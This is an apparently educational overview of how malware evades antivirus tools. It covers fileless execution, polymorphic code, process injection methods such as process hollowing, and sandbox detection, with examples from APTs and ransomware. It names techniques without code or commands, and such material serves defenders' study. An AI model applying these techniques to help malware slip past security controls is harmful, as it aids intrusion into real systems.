Antivirus Evasion
Techniques used by malware to bypass detection by traditional antivirus solutions.
Understanding Antivirus Evasion
Antivirus evasion is a critical challenge in cybersecurity, as malware authors continuously develop new techniques to bypass detection. Traditional AV solutions rely on signature-based and heuristic detection, but modern malware employs obfuscation, polymorphism, and in-memory execution to remain undetected.
Techniques Used in Antivirus Evasion
1. Fileless Malware
Executes malicious code directly in system memory without creating files on disk.
Uses built-in tools like PowerShell, Windows Management Instrumentation (WMI), and Registry scripts.
Difficult to detect since it does not leave artifacts on the file system.
2. Polymorphic and Metamorphic Malware
Polymorphic Malware: Constantly modifies its code while retaining its original functionality to avoid signature-based detection.
Metamorphic Malware: Rewrites its code entirely each time it propagates, making it even harder to identify.
Examples include ShapeShifter and Storm Worm, which continuously evolve to bypass security measures.
3. Process Injection Techniques
Injects malicious code into legitimate system processes to evade detection.
Common methods include:
DLL Injection: Inserts a malicious Dynamic Link Library (DLL) into a legitimate process.
Process Hollowing: Replaces the memory of a trusted process with malicious code.
Atom Bombing: Uses Windows atom tables to inject code without triggering AV alerts.
4. Sandbox and Virtual Machine Detection
Malware detects when it is running in a sandbox or virtual machine (VM) and alters its behavior to avoid analysis.
Techniques include:
Checking for virtualization artifacts (e.g., VMware, VirtualBox).
Monitoring system uptime to avoid execution in fresh environments.
Delaying execution until user interaction is detected.
Common Applications of Antivirus Evasion
Advanced Persistent Threats (APTs)
Used by nation-state actors and cybercriminal groups to maintain long-term access to targeted systems.
Avoids detection through stealthy, persistent malware.
Ransomware Attacks
Modern ransomware strains employ evasion techniques to bypass security controls before encrypting files.
Example: Ryuk ransomware uses process injection to execute without being flagged by AV software.
Trojan Horse Attacks
Malware disguises itself as legitimate software while executing malicious activities in the background.
Uses code obfuscation and encryption to remain undetected.